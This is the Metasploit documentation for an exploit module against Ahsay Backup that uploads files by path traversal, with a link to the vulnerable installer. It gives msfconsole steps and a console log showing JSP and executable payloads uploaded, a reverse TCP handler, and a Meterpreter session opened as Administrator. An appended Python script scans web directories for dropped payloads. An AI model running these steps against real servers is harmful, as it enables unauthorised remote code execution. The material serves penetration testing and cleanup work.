metasploit-gs/documentation/modules/exploit/windows/misc/ahsay_backup_fileupload.md
2019-07-17 12:55:18 +02:00

Vulnerable Application

Ahsay Backup v7.x - v8.1.1.50

Download the vulnerable version: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe

Start the application (I start it manually from C:\Program Files\AhsayCBS\bin\startup.bat).

Verification Steps

  1. Start msfconsole
  2. use exploit/windows/misc/ahsay_fileupload
  3. Enable trial account creation: set CREATEACCOUNT true
  4. Set RHOST: set RHOST 172.16.238.175
  5. Set LHOST: set LHOST 172.16.238.235
  6. Run the exploit: run
  7. We should receive a meterpreter shell.

Options

CREATEACCOUNT - Create a trial account. Use this when trial accounts are enabled and you do not have valid credentials.
PASSWORD - Password for the Ahsay user account. If CREATEACCOUNT is set, this password will be used.
RHOST - Target address.
RPORT - The target port (TCP).
TARGETURI - Path to the Ahsay installation.
UPLOADPATH - Path to where the file should be uploaded.
USERNAME - Username for the Ahsay account. If CREATEACCOUNT is set, this username will be used.

Scenarios

Version of software and OS as applicable

This exploit has been tested on Windows 2003 SP2.

msf exploit(windows/misc/ahsay_fileupload) > set CREATEACCOUNT true
CREATEACCOUNT => true
msf exploit(windows/misc/ahsay_fileupload) > set RHOST 172.16.238.175
RHOST => 172.16.238.175
msf exploit(windows/misc/ahsay_fileupload) > set LHOST 172.16.238.235
LHOST => 172.16.238.235
msf exploit(windows/misc/ahsay_fileupload) > run

[*] Started reverse TCP handler on 172.16.238.235:4444 
[+] Username and password are valid!
[+] No need to create account, already exists!
[*] Uploading payload
[+] Succesfully uploaded ../../webapps/cbs/help/en/lcofxnrzON.exe
[*] Uploading payload
[+] Succesfully uploaded ../../webapps/cbs/help/en/myjnJMFlNi.jsp
[*] Triggering exploit! https://172.16.238.175:443/cbs/help/en/myjnJMFlNi.jsp
[+] Exploit executed!
[*] Sending stage (179779 bytes) to 172.16.238.175
[*] Meterpreter session 1 opened (172.16.238.235:4444 -> 172.16.238.175:1114) at 2019-07-16 14:59:45 +0200
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/lcofxnrzON.exe' on the target
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/myjnJMFlNi.jsp' on the target

meterpreter > getuid
Server username: AHSAY-123\Administrator
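
As an added example (not part of the Metasploit module or of this documentation's original text), the following Python script supports the manual cleanup flagged in the output above: it walks a web-served directory such as the cbs/help tree and lists files with script or executable extensions, or with a PE header under any name. The extension list and the premise that the help directory holds only static content are assumptions; the directory to scan is supplied by the operator.

```python
import os
import sys
import time

# Assumption: extensions that should not appear in a static help directory.
# Baseline against a clean install of the same version before alerting.
SUSPECT_EXT = {".jsp", ".jspx", ".exe", ".dll", ".bat", ".war"}


def is_pe(path):
    """True if the file starts with the 'MZ' DOS/PE header, whatever its name."""
    try:
        with open(path, "rb") as fh:
            return fh.read(2) == b"MZ"
    except OSError:
        return False


def sweep(root):
    """Return a sorted list of (relative_path, reason, mtime) for suspect files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            reasons = []
            if ext in SUSPECT_EXT:
                reasons.append("extension " + ext)
            if is_pe(full):
                reasons.append("PE header")
            if reasons:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings.append((rel, ", ".join(reasons), os.path.getmtime(full)))
    return sorted(findings)


if __name__ == "__main__":
    # Hypothetical invocation: python sweep.py <path to the served help directory>
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for rel, reason, mtime in sweep(root):
        stamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(mtime))
        print(f"{stamp}  {rel}  ({reason})")
```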